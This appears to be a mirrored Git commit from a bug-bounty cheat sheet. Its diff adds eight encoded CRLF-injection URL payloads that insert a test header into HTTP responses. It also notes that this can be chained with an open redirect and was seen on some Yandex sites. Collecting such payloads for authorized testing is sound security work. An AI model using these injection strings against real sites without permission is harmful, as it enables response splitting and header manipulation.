mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2025-02-16 14:38:22 +00:00
Add more CRLF payloads.
This commit is contained in:
parent
f2be899e2e
commit
d214da501e
1 changed files with 32 additions and 0 deletions
|
@ -22,6 +22,38 @@
|
|||
%3f%0dheader:header
|
||||
```
|
||||
|
||||
```
|
||||
/%250aheader:header
|
||||
```
|
||||
|
||||
```
|
||||
/%25250aheader:header
|
||||
```
|
||||
|
||||
```
|
||||
/%%0a0aheader:header
|
||||
```
|
||||
|
||||
```
|
||||
/%3f%0dheader:header
|
||||
```
|
||||
|
||||
```
|
||||
/%23%0dheader:header
|
||||
```
|
||||
|
||||
```
|
||||
/%25%30aheader:header
|
||||
```
|
||||
|
||||
```
|
||||
/%25%30%61header:header
|
||||
```
|
||||
|
||||
```
|
||||
/%u000aheader:header
|
||||
```
|
||||
|
||||
**CRLF chained with Open Redirect server misconfiguration**
|
||||
|
||||
_Note:_ This sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)
|
||||
|
|
Loading…
Add table
Reference in a new issue